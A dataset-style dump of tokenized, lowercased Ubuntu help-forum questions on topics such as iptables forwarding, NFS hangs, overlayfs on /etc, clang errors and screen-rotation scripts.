frostwire ?
516693	which one is best web server for lua ?	i am developing small gui using lua . so , i am searching lua supported opensource web servers in internet . i got three web servers and checked . apache ( heavy ) lighttpd niginx but the above webservers are not user friendly . so , please anyone list out lua supported web servers and please suggest me which one is best based on performance , size , cpu load , mem usage , etc. ,
516696	port closed after update	the port number 51413 gets closed after every update even after creating a firewall rule it does not allow traffic to pass . please help
516697	i wish to have a structure , wherein i have an ubuntu server machine , and my agents connect to the same using thin clients . how can i do that	well i use a structure in my organisation which is as below . i have a windows server 20 agents connect to that server through a thin client using rdp and terminal services . now i want to replace the windows server with an ubuntu server . is it possible to do that ? if yes then how ? i would not like the agents to feel the difference , as majorly they use only browser based applications . and storage of files . for office , i use open office .
516698	certificate signed pdf	our company uses pdf 's secured by an .pfx . you must import the .pfx - certificate to read this document . i 've tested evince but it ca n't handle that . it works fine with the latest adobe reader for unix - but i 've read that there are much of security gaps . is there any other solution ?
516702	is ~ considered like a relative path ?	i 'm trying to extract the different part of the nvidia cuda library installer . i 'm using the following command : mkdir ~/downloads/nvidia_installers ./cuda_6.5.14_linux_64.run -extract=~/downloads/nvidia_installers and i get the following message : error : extract : path must be absolute . and when i type the command with the literal address of my home it work perfectly . ./cuda_6.5.14_linux_64.run -extract=/home/likewise-open/xxx/username/downloads/nvidia_installers i 'm confused should n't ~ be the same of /home/likewise-open/xxx/username ? tested : ./cuda_6.5.14_linux_64.run -extract= $ home/downloads/nvidia_installers and it work . but i still do n't know why it does n't allow ~
516709	how do i install mdm on ubuntu 14.04 ?	i can not find a ppa that will install mdm on my laptop . can anyone give a ppa and also tell me how to configure it ? because when i typed : sudo apt-get install mdm and sudo dpkg-reconfigure mdm there was no output ! thank you people
516710	is there any facial recognition software for logging in on ubuntu 14.04 ?	is there any facial recognition software for logging in on ubuntu 14.04 ? i 've searched the web , and found projects like pam and imrsv cara . i also found instructions for running these programs on older ubuntu versions , but i could n't find anything for ubuntu 14.04 . -dionysos
516715	how do i install windows on ubuntu	now the time has come for me to quit . i am not able to manage with ubuntu , i should not blame the developers rather i should blame myself for not understanding . i would humbly request the experts to help me in the following i have a windows iso package downloaded and stored on the desktop . please help me to create a boot-able usb of the windows os . please help me in finding the right application to create a boot-able usb from ubuntu ( i do n't have any alternative system , not alternative os installed or nothing . i am really stuck with this.. please help me to survive by installing windows .
516721	ubuntu for nokia windows phone	i am fan of ubuntu os and now ubuntu touch i m very excited . but i have nokia lumia 520 which have windows8.0 os in it . i want to shift to the ununtu touch . can you tell me how i install ubuntu touch on my nokia lumia 520 .
516722	ubuntu ( 14.04 ) on lenovo thinkpad s540	i 'm about to purchase the lenovo thinkpad s540 . i want to install ubuntu 14.04 as my primary operating system . i 've searched the web , and contacted lenovo ; but i could n't get any information about ubuntu compatibility . does anyone have experience running ubuntu on this machine ?
516728	how to move linux on a usb stick to a hard drive partition ?	i was running ubuntu on a usb stick for a while because my hard drive had failed . it had two partitions . i recently installed a new hard drive and installed windows on it . i created a new partition inside windows that is larger than the usb stick . my question is : how do i move linux to this partition on the new hard disk so that i have a dual-boot system ? i downloaded a program called easeus todo backup but it can only clone a hard disk onto a hard disk or a partition onto a partition . ubuntu is installed on the whole usb stick and has two partitions of about equal size . does anyone know how to do this ?
516729	cant change name of internal webcam via udev rules ubuntu 14.04	i need to change device name of internal camera rule : action== '' add '' , subsystem== '' video4linux '' , attr { name } == '' uvc camera ( 046d:0825 ) '' , name= '' video2 '' , symlink= '' usb/video '' , run+= '' /usr/bin/forudev '' i added symlink and run options for testing that this rule works . symlink added and command executed , but device video2 does not appear ( device name still video0 ) running man udev i read name the name to use for a network interface . the name of a device node can not be changed by udev , only additional symlinks can be created . as i understand option `` name '' usefull ony for network devices ?
516730	syslinux 6.02 - where to and what has to be copied to create a working manual install ?	i 've managed to setup a usb stick for uefi booting using refind , and would like to extend it for legacy bios booting using syslinux . however , i am missing a step and ca n't find out how to solve it . the setup : 64gb space gpt partitiontable disk has pmbr flag set 1st partition starts at 16mib and is about 45gb , a fat32 primary for data 2nd partition starts around 45gb and is the efi system ( fat32 ) with a working refind setup 3rd - 5th partition is home ( ext4 ) , swap and root ( ext4 ) of my working lubuntu 14.04.1 using dd i have copied the gptmbr.bin of my compiled 6.02 syslinux to the first 440bytes . under parted 3.2 i can see that my partition 2 has a boot and legacy_boot flag . during boot i get no bootable disk found - if i set my 5th instead of the 2nd partition to be legacy_boot i get missing os my guess is , that i have to copy some of the *.c32 and other files to a syslinux folder eighter on my efi ( where ? ! ) or on my root partition ( /boot/syslinux ? ! ) to get it to work - am i right ? what files are essential ? further , i guess i will need that syslinucx.cfg file too - right ? my goal would be at least a direct boot of the lubuntu system on the root ext4 partition . update : although i have no idea why , i got it working - but not with a manual install . the pmbr flag was bad and prohibited my uefi system from booting the stick as uefi the legacy_boot flag was necessary for my 5th partition ( linux root ) i had to use extlinux -- install /path/to/root/parition i had to create a syslinux.cfg in the syslinux folder under boot of my root partition i did all of this on a second smaller stick , then tried to copy just the syslinux folder , but had no luck - the extlinux -- install seems to be mandatory . anybod knows what exactly extlinux -- install does ? can it be done manually or how else could you install a newer version like 6.02 without installing it on to your system ?
516731	how to route inbound traffic on one interface to another interface in the same machine ?	i have searched the forums , but ca n't find a solution that addresses my use-case exactly . i need to do this on a remote machine and so do n't have a lot of latitude to get this wrong ( and possibly lock myself out of the box ) . the remote pc has two physical interfaces : eth0 and eth1 . eth0 ip is 192.168.0.4/255.255.255.0 while eth1 is 192.168.1.60/255.0.0.0 i need to route/forward inbound tcp traffic on port 502 received on eth0 to 192.168.1.50 port 502 ( this is a remote device accessible via the eth1 network ) . i need to do the same above for udp on port 30718 . i have read the iptables how to but am not sure whether to use input or forward etc . any help on how to use iptables to do this would be very much appreciated ! thanks , jean-marc
516734	warning : target is empty make : nothing to be done for `first	can anyone help with this error warning : target is empty make : nothing to be done for first ' . i wish to build this qt package when i run ./compile in the the downloaded folder , it gives this error , im no programmer and did not write this code . if anyone could look at this and give me there opinion i would be very grateful . here 's the code for downloading and installing git clone https : //code.google.com/p/vaio-f11-linux.control-center/ cd vaio-f11-linux.control-center ./compile ./run
516735	dell m6300 with docking station dvi monitor is dark	2 scenarios : both scenarios are booted this way . this has nothing to do with hot docking or plugging/unplugging things while running . without docking station : primary monitor during bios posting is dvi , so physical connection is working just fine 2 monitor support works fine with both nvidia and x-org drivers ca n't tell you much more , cause i ca n't see anything with docking station primary monitor during bios posting is dvi , so physical connection is working just fine using nvidia drivers , both screens are dark once booted ( never even see the login prompt ) using x-org drivers the vga screen is usable , and the dvi is dark display config shows both monitors , and windows will come up on the dvi monitor and i have move them using the start bar icons and the right click menus back onto the screen that is displaying things . how do i get the dvi screen to light up when connected via the docking station ? additional notes : if i move from docked to undocked and then plug in the same two monitors , both of them work without having to reboot . kde plasma is in use
516740	does installng ubutun overwrite windows ?	will my window os overwrite after ubutun os downloaded and installed ? thanks and best regards jacky loh
516752	why i ca n't open qml file ?	i try to develop a very simple application in qml for ubuntu-touch ! on desktop , when i press the button `` add debpt '' it 's open a form : when i lunch it into a emulator , i have nothing : this is my main.qml file import qtquick 2.0 import ubuntu.components 0.1 import `` components '' import qtquick.localstorage 2.0 import qtquick.layouts 1.1 /* ! \brief mainview with a label and button elements . */ mainview { width : 400 // objectname for functional testing purposes ( autopilot-qt5 ) objectname : `` mainview '' // note ! applicationname needs to match the `` name '' field of the click manifest applicationname : `` com.ubuntu.developer.z-admin-angels-gmail-com.oweme '' /* this property enables the application to change orientation when the device is rotated . the default is false . */ automaticorientation : true height : units.gu ( 75 ) page { y : 76 width : 400 anchors.rightmargin : 0 anchors.bottommargin : 0 anchors.leftmargin : 0 title : i18n.tr ( `` oweme '' ) column { width : 400 anchors.rightmargin : 8 anchors.bottommargin : 8 anchors.leftmargin : 24 anchors.topmargin : 24 spacing : units.gu ( 1 ) anchors { margins : units.gu ( 2 ) fill : parent } row { id : rowbutton x : 0 y : 30 width : 350 height : 65 button { objectname : `` adddebpt '' text : i18n.tr ( `` add debpt '' ) color : ubuntucolors.midaubergine onclicked : { var component = qt.createcomponent ( `` qml/addform.qml '' ) ; if ( component.status == component.ready ) component.createobject ( label1 , { `` x '' : 0 , `` y '' : 0 } ) ; } } /*button { width : 153 objectname : `` addcommunbuy '' text : i18n.tr ( `` add commun buy '' ) color : ubuntucolors.lightaubergine onclicked : { } } */ button { width : 153 objectname : `` removedebpt '' text : i18n.tr ( `` remove debpt '' ) color : ubuntucolors.lightaubergine onclicked : { } } } // buttongrid } label { id : label1 x : 37 y : 127 width : 300 height : 200 // text : qstr ( `` open qml here '' ) font.pointsize : 21 horizontalalignment : text.alignhcenter wrapmode : text.wrapanywhere } } // grid content } and this is my addform.qml file import qtquick 2.0 import ubuntu.components 0.1 column { width : 300 height : 100 row { text { id : lbperson x : 2 y : 4 width : 70 height : 27 text : qstr ( `` personn : '' ) font.pixelsize : 15 } textfield { x : 70 width : 200 objectname : `` tfperson '' placeholdertext : i18n.tr ( `` add the person concerned '' ) } // textfield } row { text { id : lbmontant x : 2 width : 70 height : 27 text : qstr ( `` montan : '' ) font.pixelsize : 15 } textfield { x : 91 width : 60 objectname : `` tfmontant '' validator : intvalidator { } placeholdertext : i18n.tr ( `` montant '' ) } // textfield } // row } // colonne console gives no particular error i have no idea why it do n't lunch
516754	problems running grisaia no kajitsu with wine hq on ubuntu 14.04	i 'm running xubuntu 14.04 with wine 1.7 . so here 's the thing , i have downloaded a visual novel called `` grisaia no kajitsu '' from fuwanovel ; the game run without any errors until a certain point , the screen turns complete blank with no sound . i tried to redownload and reinstall the game but this time , with wine 1.6 , the game start with a black screen with audio ( odd ! ) , while with wine 1.7 , it crashes . i am sure that the setup files were just fine , but i have no idea what was wrong with wine this time . please help ! my screenshot :
516759	lubuntu package only halfway install	how can i repair the download from the terminal ? it was installing lubuntu 14.04 when the terminal was closed . after that the desktop only has a logout option and if i try to do any keyboard shortcuts it will crash . luckily i also had xubuntu on the same hard drive . i would just like to use lubuntu because i heard of how lightweight it is compared to xubuntu . specs : -2 gb ram -15 mb write speed ( hard drive is a microsd ) -quad core arm processor each at 1 ghz now you can see why ... anyway , any help with this would be much appreciated . : ) i really want to use lubuntu to get good speed so that i can use it on 1080p . thanks . : d
516760	kodak aio esp5250 stopped printing after upgrade to 14.04 . printer seems there and ok	i am logged in to 14.04 with gnome metacity because of older hardware . my esp5250 worked fine in 12.04 using cups ( c2esp16 ) . one problem i had before was that there is no gui icon in system/administration for printer or settings . so i would like to clean that up also . all the ubuntu troubleshooting tips for network printers seem to work fine . printer is there , active responding etc . how to i find out what driver i am using currently ? what shell commands do i use to query the driver . i think it has been upgraded with 14.04 . how do i fix the gnome package for printing so i have all the utilities ( administration/printers ) . thanks
516762	emacs keybindings in lubuntu	is there a way to enable ubiquitous emacs keybindings in lubuntu ? i 've seen solutions for ubuntu and xubuntu , such as emacs keybindings in ubuntu 12.04 , but i have n't found one for lubuntu .
516764	running python module in gedit embedded terminal	i 'm new to python and i 'm trying to run my first module but i ca n't do that through gedit embedded terminal the code i wrote is def num ( b ) : print ( `` give a number '' ) b = b +5 print ( b ) i managed to run it easily in idle but could n't in gedit terminal i tried giving it chmod +xand used ./num.py to run it also tried python num.py but nothing happens the terminal just moves to a new line
516765	steam will not open	hello i recentley installed xubuntu to my hp pavilion dv6000 , but come across a problem when trying to open steam this is the terminal message i got when launched with terminal : running steam on ubuntu 14.04 64-bit steam_runtime is enabled automatically installing breakpad exception handler for appid ( steam ) /version ( 1407966480_client ) installing breakpad exception handler for appid ( steam ) /version ( 1407966480 ) installing breakpad exception handler for appid ( steam ) /version ( 1407966480 ) installing breakpad exception handler for appid ( steamwebhelper ) /version ( 20140813141634 ) installing breakpad exception handler for appid ( steamwebhelper ) /version ( 1407939394 ) installing breakpad exception handler for appid ( steamwebhelper ) /version ( 20140813141634 ) installing breakpad exception handler for appid ( steamwebhelper ) /version ( 1407939394 ) fontconfig error : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 70 : non-double matrix element fontconfig error : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 70 : non-double matrix element fontconfig warning : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 78 : saw unknown , expected number installing breakpad exception handler for appid ( steam ) /version ( 1407966480 ) installing breakpad exception handler for appid ( steam ) /version ( 1407966480 ) installing breakpad exception handler for appid ( steam ) /version ( 1407966480 ) installing breakpad exception handler for appid ( steam ) /version ( 1407966480 ) installing breakpad exception handler for appid ( steam ) /version ( 1407966480 ) installing breakpad exception handler for appid ( steam ) /version ( 1407966480 ) generating new string page texture 2 : 48x256 , total string texture memory is 49.15 kb generating new string page texture 3 : 256x256 , total string texture memory is 311.30 kb installing breakpad exception handler for appid ( steam ) /version ( 1407966480 ) installing breakpad exception handler for appid ( steam ) /version ( 1407966480 ) installing breakpad exception handler for appid ( steam ) /version ( 1407966480 ) installing breakpad exception handler for appid ( steam ) /version ( 1407966480 ) installing breakpad exception handler for appid ( steam ) /version ( 1407966480 ) adding licenses for the following package ( s ) : 0 , 2481 , 13054 , 45611 , 45706 , 47618 , 48323 , 48324 , 48325 , 49875 roaming config store loaded successfully - 686 bytes . migrating temporary roaming config store failed to init steamvr because it is n't installed execcommandline : `` '' /home/sam/.local/share/steam/ubuntu12_32/steam '' `` system startup time : 8.55 seconds running steam on ubuntu 14.04 64-bit steam_runtime has been set by the user to : /home/sam/.local/share/steam/ubuntu12_32/steam-runtime uploading dump ( out-of-process ) [ proxy '' ] /tmp/dumps/assert_20140827162522_1.dmp /home/sam/.local/share/steam/steam.sh : line 730 : 3269 segmentation fault ( core dumped ) $ steam_debugger `` $ steamroot/ $ steamexepath '' `` $ @ '' requested force create but sharedobjectmutex already created forced create but already created for sharedobjectevent forced create but already created for sharedobjectevent
516767	hibernating win7 - startup starts xubuntu with error	on my dell vostro 3550 i have windows 7 and xubuntu 14.04 installed . when i hibernate windows 7 and start the machine the xubuntu screen is shown telling me about an error about filesystem check of my windows partition . i can then press s , d or just restart the machine via ctrl+alt+del . restart is the only option coming up to grub menu and i have to manually switch to windows 7 and then it will boot fine up . is this a problem about the default boot option of grub or is it something else ?
516768	ubuntu -- expected default user and group for /usr folders and children	i 'm on ubuntu 14.04 and was running into problems with vagrant and virtualbox v4.3.14 that proved to be an ownership problem with the /usr folder . looks like something changed the user/group of those folders to 500:504 . what is the expected default user and groups of /usr , /usr/src/ and /usr/local ? also is there ubuntu specific docs that i can answer this question with anywhere in the future ? currently my folder details look like this : /usr drwxr-xr-x 10 500 544 4.0k jan 31 2013 . drwxr-xr-x 23 root root 4.0k aug 26 22:11 .. ├── [ drwxr-xr-x root root ] bin ├── [ drwxr-xr-x root root ] games ├── [ drwxr-xr-x root root ] include ├── [ drwxr-xr-x root root ] lib ├── [ drwxr-xr-x 500 544 ] local ├── [ drwxr-xr-x root root ] sbin ├── [ drwxr-xr-x 500 544 ] share └── [ drwxr-xr-x root root ] src /usr/local drwxr-xr-x 10 500 544 4.0k jan 31 2013 . drwxr-xr-x 10 500 544 4.0k jan 31 2013 .. ├── [ drwxr-xr-x 500 544 ] bin │ └── [ -rwxr-xr-x 500 544 ] budget ├── [ drwxr-xr-x root root ] etc ├── [ drwxr-xr-x root root ] games ├── [ drwxr-xr-x root root ] include ├── [ drwxr-xr-x root root ] lib │ ├── [ drwxrwsr-x root staff ] python2.7 │ └── [ drwxrwsr-x root staff ] python3.4 ├── [ lrwxrwxrwx root root ] man - > share/man ├── [ drwxr-xr-x root root ] sbin ├── [ drwxr-xr-x 500 544 ] share │ ├── [ drwxr-xr-x 500 544 ] budget │ ├── [ drwxrwsr-x root staff ] ca-certificates │ ├── [ drwxrwsr-x root staff ] fonts │ ├── [ drwxr-xr-x root root ] man │ ├── [ drwxrwsr-x root staff ] sgml │ └── [ drwxrwsr-x root staff ] xml └── [ drwxr-xr-x root root ] src
516769	upgrade from 13.10 to 14.04 lts 32 bit not booting	when ubuntu 14.04 lts trys to boot i get several lines like this : bad i/o access at port x20000 ( out1 ( val , port ) the port numbers go from x2000 through x2024 at that last message the boot stalls and after a few minutes the crt screens go black . i tried booting with adanced options . there are 6 choices : 3.13.0.34 generic 3.13.0.34 with support 3.11.0.26 generic 3.11.0.26 with support 3.08.0-35 generic : this one boots into 14.04 lts 3.08.0-35 with support . if i go into the 3.13.0.34 with support , i can pick to resume booting and then the boot works but the screen size is wroung . what is wrong with the default 3.13.0.34 generic boot ? how can i fix ?
516771	list all manually created files or files with a high 'user information input entropy '	classically linux consists of many files being libraries , executables , configuration and documents . the general idea is that such files are just bytes and can all be considered similarly . however , each time when i ( re ) install my linux ( ubuntu ) , i need to carefully consider which files i want to keep and which i do n't need . if possible i keep my previous os partition , since hard disks are huge anyway . sometimes this is not possible or practical . in these cases i just copy /etc , /home and /var . since they seem to contain most valuable stuff : the high entropy information . other directories like /usr , /lib and /opt i do n't copy , since these are just large binaries available in the package manager . however , sometimes i do put stuff in these directories , and each time i reinstall i find myself forgetting to back these up . for example , i always create a /usr/bin/matlab which sets some environment variables and then runs matlab . in order to manually recreate it i need to google the right environment variables that i need to set and put this in a file again . this is a small , yet annoying pain and i keep wondering , are there more files which i may have forgotten and may be harder to reacquire ? is there some tool to list all relevant ( high user information input entropy ) files on a filesystem ? or is there a way to allow me to copy and ignore roughly the huge amount of binaries that are in apt-get ( i.e . favoring false-positives in high user information input entropy detection ) .
516772	how to access files/directories with space in the name ?	through terminal i cant access the files or directories with a space in their names.say cd command says- no file or directory.is there any way for it or should i rename all files having spaces in between
516774	can i restore a backup on a different computer than it was made ?	i am using the default backup software for ubuntu 14.04 ( deja dup ) . it backs up weekly to a network location . i 'm about to put a new hard drive in my laptop , and i would rather just install ubuntu and put my files in rather than copy over the whole os and everything . if i reinstall ubuntu and connect to the network backup location , can i restore my backup ?
516775	battery critically low false alert in ubuntu 14.04 lts	since i have installed ubuntu 14.04 on my notebook lenovo ideapad y570 , the operating system inform me sometimes that a battery has critically low status when in fact is pretty charged ( even 90 % ) , and then my laptop is going to sleep after a moment . i have tried a solution with dconf and setting use_time_for_policy false but it brings no result . i also noticed that this problem did n't occur previously in ubuntu 12.04 lts . when i shutdown notebook and then i start it again it seems to be all okay but when i get alert with critically low battery status and i reboot notebook without switching off , this problem persists . i 'll be thankful for any help because my battery was bought in february and in windows i do n't get any alerts . i 'd like also mention that when i reboot notebook and then choose windows in grub , in windows also battery level is shown as 0 % .
516777	md5 hash for xubuntu-14.04.1-desktop-amd64.iso	i cant find the md5 hash for xubuntu-14.04.1-desktop-amd64.iso anywhere here . ps : i know that the 14.04 md5 are there .
516778	empathy wo n't login my hangout account	it 's just that , there 's no error or anything , sometimes ( not always ) when i try to login to my google account to chat using hangout it just wo n't . it 's like it tries to log in but it ca n't and then it says `` change your presence to see contacts here '' and if you click on `` go online '' it is just the same . sometimes restarting the whole system works , sometimes it does n't . i was using pidgin before empathy , and i never had this problem , but i really do n't like pidgin so i 'd like empathy to work for me . i search for this question but did n't find this particular case .
516779	juju not able to start lxc containers , because br0 not set up after reboot ( bug # 1271144 )	i am about to set up a maas with juju to deploy openstack into it . i am using ubunutu server lts 14.04.1 with juju version 1.20.5-trusty-amd64 . when i want to start an lxc container , i get `` agent-state-info : container failed to start '' . when connecting to the machine i can see no br0 network device is available . i already restarted the machine before . so i think i am running into the following bug : https : //bugs.launchpad.net/juju-core/+bug/1271144 are there any workarounds for this ? the one mentioned in the ticket ( sudo bash -c `` ifdown eth0 ; ifup eth1 ; ifup br0 '' ) does not work for me , as the interface br0 is not known ( ignoring unknown interface br0=br0 . ) is there any workaround available for this bug ? i am currently stuck at this point as i can not set up lxc containers . i already had them running with ubuntu server 14.04 a few weeks ago . now with 14.04.1 it does n't seem to work anymore . thanks in advance for you help ! edit : after further investigation i found out that it seems to be related explicitly to the one computer i am using . directly after juju bootstrapping the node i can see , that no eth0 and br0 network devices are available . only a p10p1 network device is available . i bootstrapped juju to another node and everything looks good and lxc containers can be created . something else i noticed with the computer that is not working is , that the cpu count and memory can not be determined by maas . both are listed as 0 in the maas gui . it is an older pc with an athlon x2 processor i think .
516782	second monitor not detected nvidia ubuntu 14.04	i 'm relatively new to ubuntu . i have an hp with intel xeon and nvidia quadro fx380 gpu with dual monitors ( dell 19 '' and hp 24 '' . i 've been happily using it for the past 6 months but last week i upgraded from 12.04 to 14.04 , when i rebooted it , the second monitor disappeared . first off i go the display settings to realize that the detect button does n't detect my second display . i 've tried to upgrade nvidia proprietary driver but the software manager shows me ( since i ca n't post images ... ) : nvidia corporation : g96gl [ quadro fx 380 ] this device is using the recommended driver -using nvidia binary driver - version 331.38 from nvidia-331 ( proprietary , tested ) and finally when i access x server display configuration in nvidia settings . it tells me that their is just one display . i tried to reinstall the driver for the gpu and it crashed , i had to reinstall ubuntu . please help , i 'm desperate to get my second display back .
516783	upstart auto restart mysql when it stops	i was searching for a upstart script to auto restart mysql service when it crash since i need to manually use : sudo service mysql restart i 'm new to ubuntu and i did not find it after many days of searching .
516784	memory usage by compiz in ubuntu 14.04	having scanned the various sources to check out the issue with compiz memory leak , i have not found any solution to reduce it . it keeps growing and beyond a point , i have to restart the pc . my config : amd fx 4100 quad core , 4 gb ram , 64 gb ssd , ubuntu 14.04 , 64 bit , fully patched display card - ge force 8400 gs - connected two monitors any help is appreciated . this card works fine in ubuntu 12.04 with compiz memory utilization hovering around 65 mb . there is no default display on the motherboard and i have to use this external display card . thanks for your help !
516785	removing shutdown option from menu	i want to remove shutdown , restart and all other menus except logout from ui on desktop . i want to keep them only for root or particular user . how can i do that ?
516786	how to stop zoom feature in 12.04	how do i turn off the zoom feature on ubuntu 12.04.. the scoll on my mouse makes web sites zoom in and out..
516787	sorting two columns with sort and uniq	i have a file that needs sorting in a specific way but i ca n't figure out how to do it . i 've tried the following command but it does n't give me what i want : sort -t '' `` -k1,1 original_file | uniq -d > desired_output original_file : user1 us user1 ng user2 us user3 us user4 us user4 en user5 us desired_output : user1 us user1 ng user4 us user4 en
516790	how to install ubuntu touch on the nexus 7 2013 ?	how do i install ubuntu touch on the nexus 7 2013 ?
516791	possible bug for display resolution in virtualbox on ubuntu 14.04	i have installed ubuntu 14.04 lts on a virtual box hypervisor , and when trying to change the default display resolution ( namely 800x600 ) i realised there are no other values for that . therefore it is not possible to span the window . so my question is whether i came across a bug or otherwise there is any alternative way to get a higher resolution . kind regards , pedro
516792	openbox - how to automatically suspend on idle ?	environment : ubuntu 14.04 bare minimal + openbox i have installed pm-utils . specfically , pm-suspend works great on my laptop . however , i have to run it manually . i am wondering if there is a way to set openbox to automatically suspend after , say , 15 minutes of idle time .
516793	nfs client 's nautilus hangs when nfs server is ofline	nfs server : ubuntu 14.04 server nfs client : ubuntu 14.04 desktop 64 bit on client i mounted the nfs share mount -v -t nfs nfsserver_ip : /servernfsfolder ~/clientnfs mount was successful and i was able to see all the nfs shared files in my ~/clientnfs folder via file explorer . issue : suppose nfs server go offline while i have the nfs share mounted on my client , my client 's nautilus will hang , also i can not do an 'ls ' in my home directory . how can i make my nfs client machine to unmount the nfs share automatically when my server goes offline ?
516795	using overlayfs to enable writing on a read only /etc	is it a terribly bad idea to create a union mount , using overlayfs , on top of /etc ? i 'm aiming to set up a system whereby a read-only root filesystem is installed on an sd card , with writeable areas on an ssd . it 's easy to put most of the writeable areas on the ssd , with the exception of those parts of /etc which require writing to , by the system . importantly , i want to make some parts of /etc persist between boots . so my top layer of the union mount will contain a read-write copy of /etc , called /etcrw , which will be on a read-write partition of my ssd . /etcrw will only contain the files that need to be writeable , any other files will be read 'through ' from the real read-only /etc below . i 'm fine with remounting / as read-write to complete any maintenance required ( such as editing fstab or interfaces files ) , and then setting it back to read-only again . i think i need to create the mount point at /etc , so that all processes that need to refer to /etc can still find it . my proposed command is : $ mount -t overlayfs overlayfs /etc -o rw , upperdir=/etcrw , lowerdir=/etc it seems to work with only a few bugs , from my fairly uninformed viewpoint , but there could be nasty stuff going on , that i do n't know to look for ! i know i ca n't just stuff this into fstab to mount at boot , and will have to come up with a boot script to have the system mounted in this way automatically . this should help with some of the issues thrown up by a very confused mtab , and an inability to write to /boot/grub/grubenv on shutdown . it would be great to know if this is an insane/rubbish idea , or can be achieved more simply using another approach ?
516799	how to enable single click ?	i have ubuntu 13.1 installed with the default window manager and de . i am trying to enable single click so i can open files and folders with only one click . i tried googling and all results said to open files , then go to preferences from top bar but my top bar has no options . picture of desktop : http : //i.imgur.com/tc71n1u.png
516800	re : installing ubuntu on a ntfs flash drive	i wanted to create a bootable windows and ubuntu on my flash drive . due to fat32 constraint on windows , i formatted my flash drive to ntfs . but after i installed ubuntu into the flash drive and boots it , it keeps giving error running it . im currently using yumi to create all these bootable stuffs and had a 32gb usb3.0 to store these inside . hope i can get a clear and dumb-proof solution . ( sorry if i 'm asking too much )
516801	clang++ fails to compile simple hello world c++ program	after upgrade to 14.04 from 12.04 clang++ stopped working . $ cat test.cpp # include < iostream > int main ( ) { std : :cout < < `` hello world '' < < std : :endl ; return 0 ; } $ clang++ test.cpp test.cpp:1:10 : fatal error : 'iostream ' file not found # include < iostream > ^ 1 error generated installed with apt-get install clag-3.5 same happened with clang-3.4 thanks
516802	how to disable notifications sound while xbmc is runnig ?	i would like to know if it 's possible to disable notification using xbmc ( mails , network etc ) . i 'm using kubuntu 14.04.1 . i 've found this command but the script does n't work , the sound is re-enabled by xbmc : # ! /bin/bash qdbus org.kde.kmix /mixers/pulseaudio__playback_streams_3/restore_sink_input_by_media_role_event volume 0 xbmc qdbus org.kde.kmix /mixers/pulseaudio__playback_streams_3/restore_sink_input_by_media_role_event volume 100 i presice that the command line with qdbus is working independently in the terminal . thanks
516803	user only has access to one file	i 'm working on an appliance that has a web based gui for setting up the network on an ubuntu headless system . initially the system will be set up for dhcp but one of the initial configurations will be to apply a static ip address to it , using the gui . i 'm sure it 's going to happen that if they end up inadvertently submitting incorrect tcp/ip settings through the gui , the appliance will either reboot or restart the networking services , but now the user has no access to the gui via a browser . i 'm thinking of setting up an ubuntu `` network disaster '' user whose credentials are known to the end user which would permit them to log into the system , only via a terminal session ( keyboard and monitor plugged into the appliance ) . however , i only want them to have access to /etc/network/interfaces once they 've logged in . ideally they 're locked down to their home folder ( or perhaps /etc/network is set to be their home folder ) and ca n't navigate anywhere else on the file system . the only file they have read/write access to is the interfaces file . is this possible ? i 've read a lot of posts about setting up ssh users etc etc but i 've not seen anything about restricting one user to just their home folder and that 's it ... ?
516804	dual boot windows 8 with ubuntu 14.04	i had installed ubuntu with a dual boot mechanism . for some days i was unable to boot into ubuntu . windows 8 booted just fine . after some days when i switched my laptop on , ubuntu 14.04 booted up directly . i did n't get a option to choose which os to boot . till now i have been using ubuntu 14.04 and i never got a option to choose which os to boot . please help regards , sagar
516806	setting up a script to rotate scren lenovo yoga thinkpad s1	i am trying to set up a lenovo yoga thinkpad s1 to rotate the screen with the touch of a button but i am having a little trouble with the script that actually does the work . i have found the scripts that does everything i need here . the script that is giving me trouble is the first tone of post number 6 . the script is as follows : # ! /bin/bash # script rotates screen 90deg on every run , and also rotates touchscreen and wacom input . # in modes other than normal , touchpad is deactivated . current_orientation ( ) { xrandr|grep `` connected '' |awk ' { print $ 4 } ' } # orientation=`current_orientation` case $ ( current_orientation ) in `` ( normal '' ) xrandr -o left xsetwacom set `` wacom isdv4 ec pen stylus '' rotate ccw xsetwacom set `` wacom isdv4 ec pen eraser '' rotate ccw synclient touchpadoff=1 xinput set-prop -- type=int -- format=8 `` elan touchscreen '' `` evdev axes swap '' `` 1 '' xinput set-prop `` elan touchscreen '' `` evdev axis inversion '' 1 0 onboard & ; ; '' inverted '' ) xrandr -o right xsetwacom set `` wacom isdv4 ec pen stylus '' rotate cw xsetwacom set `` wacom isdv4 ec pen eraser '' rotate cw xinput set-prop -- type=int -- format=8 `` elan touchscreen '' `` evdev axes swap '' `` 1 '' xinput set-prop `` elan touchscreen '' `` evdev axis inversion '' 0 1 ; ; '' right '' ) xrandr -o normal xsetwacom set `` wacom isdv4 ec pen stylus '' rotate none xsetwacom set `` wacom isdv4 ec pen eraser '' rotate none synclient touchpadoff=0 xinput set-prop -- type=int -- format=8 `` elan touchscreen '' `` evdev axes swap '' `` 0 '' xinput set-prop `` elan touchscreen '' `` evdev axis inversion '' 0 0 killall onboard ; ; '' left '' ) xrandr -o inverted xsetwacom set `` wacom isdv4 ec pen stylus '' rotate half xsetwacom set `` wacom isdv4 ec pen eraser '' rotate half xinput set-prop -- type=int -- format=8 `` elan touchscreen '' `` evdev axes swap '' `` 0 '' xinput set-prop `` elan touchscreen '' `` evdev axis inversion '' 1 1 ; ; * ) synclient touchpadoff=0 echo `` c est autre chose '' current_orientation # echo $ orientation ; ; esac when i run the script from the button nothing happens . ( button is configured to call the script from keyboard shortcuts ) . i have set the script to execute with chmod +x . however , when i run the script from the command line i get `` c est autre chose '' . as this is is in the script i can see that the script is working ? ? - i guess . but it does not rotate the screen at all . or turn off touchpad . this script works for others with the same model of computer using different flavors of ubuntu . i am running ubuntu gnome 14.04 . i have already set up the palm rejection script also found in post number 6 and it is working fine . i would ask on the forum where i found the script but registration is temporarily closed .
516807	how to manage network in packet and out packet ?	looking for solution for ubuntu system , i had a computer with 2 different internet connection and 2 ip address . one is static ip address where second is dyanamic ip address . want to receive request packget from static ip address only and response package via dynamic ip address . if dynamic ip internet down , then send response package from static internet lines . how to make this possible ! ! expert please give ideas .
